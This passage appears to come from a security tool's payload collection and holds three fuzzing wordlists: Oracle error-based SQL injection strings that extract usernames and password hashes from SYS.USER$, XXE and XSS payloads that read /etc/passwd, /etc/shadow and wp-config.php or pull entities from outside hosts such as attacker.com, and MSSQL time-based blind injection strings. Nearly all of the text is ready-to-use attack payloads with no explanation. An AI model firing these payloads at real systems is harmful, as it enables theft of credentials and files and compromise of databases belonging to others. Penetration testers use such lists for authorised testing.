' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i 14 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i 15 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i 16 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i 17 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i 18 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i 19 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i 20 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i 21 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i 22 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i 23 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i 24 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i 25 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT 
DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i 26 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i 27 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i 28 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i 29 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i 30 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i 31 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i 32 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i 33 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i 34 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i 35 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i 36 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE 
LIMIT=5)) AND 'i'='i 37 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i 38 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i 39 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i 40 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i 41 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i 42 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i 43 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i 44 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i 45 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i 46 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i 47 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i 48 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT 
DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i 49 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i 50 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i 51 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i 52 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i 53 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i 54 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i 55 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i 56 | -------------------------------------------------------------------------------- /Web Application/XXE/Intruder/xml-attacks.txt: -------------------------------------------------------------------------------- 1 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> 2 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]> 3 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]> 4 | <!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]> 5 | <?xml 
version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall> 6 | <?xml version="1.0"?><change-log><text>Hello World</text></change-log> 7 | <?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log> 8 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log> 9 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log> 10 | <!ENTITY systemEntity SYSTEM "robots.txt"> 11 | <change-log> <text>&systemEntity;</text> </change-log> 12 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log> 13 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log> 14 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log> 15 | <test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test> 16 | <?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log> 17 | count(/child::node()) 18 | x' or name()='username' or 'x'='y 19 | <name>','')); phpinfo(); exit;/*</name> 20 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 21 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 22 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 23 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 24 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo> 25 | <?xml version="1.0" 
encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> 26 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo> 27 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> 28 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> 29 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" 30 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 31 | <xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 32 | <HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML> 33 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 34 | <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 | <?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]> 37 | ‘ 38 | “ 39 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log> 40 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM 
"php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc> 41 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 42 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 43 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 44 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo> 45 | "}}</script><script>alert(1);</script></body></html><!-- 46 | }}</script>'" 47 | }}</script>' 48 | '}}</script>' 49 | '}}</script>" 50 | <?xml version="1.0" encoding="utf-16" standalone="yes"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://wordpress.org/</string></value></param><param><value><string>http://xerosecurity.com</string></value></param></params></methodCall> 51 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "../../../../../../../etc/passwd">]><methodCall><methodName>&xxe</methodName></methodCall> 52 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall> 53 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall> 54 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 55 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" 
DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 56 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 57 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 58 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc> 59 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo> 60 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo> 61 | }}</script><script>alert(1);</script></body></html><!-- 62 | "}}</script>' 63 | }}</script>""'" 64 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg> 65 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg> 66 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 67 | <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> 68 | 69 | 
-------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_TimeBased.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ');WAITFOR TIME '00:00:10'-- 8 | ');WAITFOR+DELAY+'00:00:10'-- 9 | ');WAITFOR DELAY '00:00:10'-- 10 | ) waitfor delay '0:0:20' /* 11 | ) waitfor delay '0:0:20' -- 12 | )) waitfor delay '0:0:20' /* 13 | )) waitfor delay '0:0:20' -- 14 | ))) waitfor delay '0:0:20' /* 15 | ))) waitfor delay '0:0:20' -- 16 | )))) waitfor delay '0:0:20' /* 17 | )))) waitfor delay '0:0:20' -- 18 | ))))) waitfor delay '0:0:20' -- 19 | )))))) waitfor delay '0:0:20' -- 20 | ') waitfor delay '0:0:20' /* 21 | ') waitfor delay '0:0:20' -- 22 | ") waitfor delay '0:0:20' /* 23 | ") waitfor delay '0:0:20' -- 24 | ')) waitfor delay '0:0:20' /* 25 | ')) waitfor delay '0:0:20' -- 26 | ")) waitfor delay '0:0:20' /* 27 | ")) waitfor delay '0:0:20' -- 28 | '))) waitfor delay '0:0:20' /* 29 | '))) waitfor delay '0:0:20' -- 30 | "))) waitfor delay '0:0:20' /* 31 | "))) waitfor delay '0:0:20' -- 32 | ')))) waitfor delay '0:0:20' /* 33 | ')))) waitfor delay '0:0:20' -- 34 | ")))) waitfor delay '0:0:20' /* 35 | ")))) waitfor delay '0:0:20' -- 36 | '))))) waitfor delay '0:0:20' /* 37 | '))))) waitfor delay '0:0:20' -- 38 | "))))) waitfor delay '0:0:20' /* 39 | "))))) waitfor delay '0:0:20' -- 40 | ')))))) waitfor delay '0:0:20' /* 41 | ')))))) waitfor delay '0:0:20' -- 42 | ")))))) waitfor delay '0:0:20' /* 43 | ")))))) waitfor delay '0:0:20' -- 44 | )%20waitfor%20delay%20'0:0:20'%20/* 45 | )%20waitfor%20delay%20'0:0:20'%20-- 46 | ')%20waitfor%20delay%20'0:0:20'%20/* 47 | ')%20waitfor%20delay%20'0:0:20'%20-- 48 | ")%20waitfor%20delay%20'0:0:20'%20/* 49 | ")%20waitfor%20delay%20'0:0:20'%20-- 50 | 
))%20waitfor%20delay%20'0:0:20'%20/* 51 | ))%20waitfor%20delay%20'0:0:20'%20-- 52 | '))%20waitfor%20delay%20'0:0:20'%20/* 53 | '))%20waitfor%20delay%20'0:0:20'%20-- 54 | "))%20waitfor%20delay%20'0:0:20'%20/* 55 | "))%20waitfor%20delay%20'0:0:20'%20-- 56 | ,NULL)%20waitfor%20delay%20'0:0:20'%20/* 57 | ,NULL)%20waitfor%20delay%20'0:0:20'%20-- 58 | ',NULL)%20waifor%20delay%20'0:0:20'%20/* 59 | ',NULL)%20waitfor%20delay%20'0:0:20'%20-- 60 | ",NULL)%20waitfor%20delay%20'0:0:20'%20/* 61 | ",NULL)%20waitfor%20delay%20'0:0:20'%20-- 62 | ),NULL)%20waitfor%20delay%20'0:0:20'%20/* 63 | ),NULL)%20waitfor%20delay%20'0:0:20'%20-- 64 | '),NULL)%20waifor%20delay%20'0:0:20'%20/* 65 | '),NULL)%20waitfor%20delay%20'0:0:20'%20-- 66 | "),NULL)%20waitfor%20delay%20'0:0:20'%20/* 67 | "),NULL)%20waitfor%20delay%20'0:0:20'%20-- 68 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 69 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 70 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 71 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 72 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 73 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 74 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 75 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 76 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 77 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 78 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 79 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 80 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 81 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 82 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 83 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 84 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 85 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 86 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 87 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 88 | '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 89 | 
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 90 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 91 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 92 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 93 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 94 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 95 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 96 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 97 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 98 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 99 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 100 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 101 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 102 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 103 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 104 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 105 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 106 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 107 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 108 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 109 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 110 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 111 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 112 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 113 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 114 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 115 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 116 | ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 117 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 118 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 119 | 
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 120 | ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 121 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 122 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 123 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 124 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 125 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 126 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 127 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 128 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 129 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 130 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 131 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 132 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 133 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 134 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 135 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 136 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 137 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 138 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 139 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 140 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 141 | 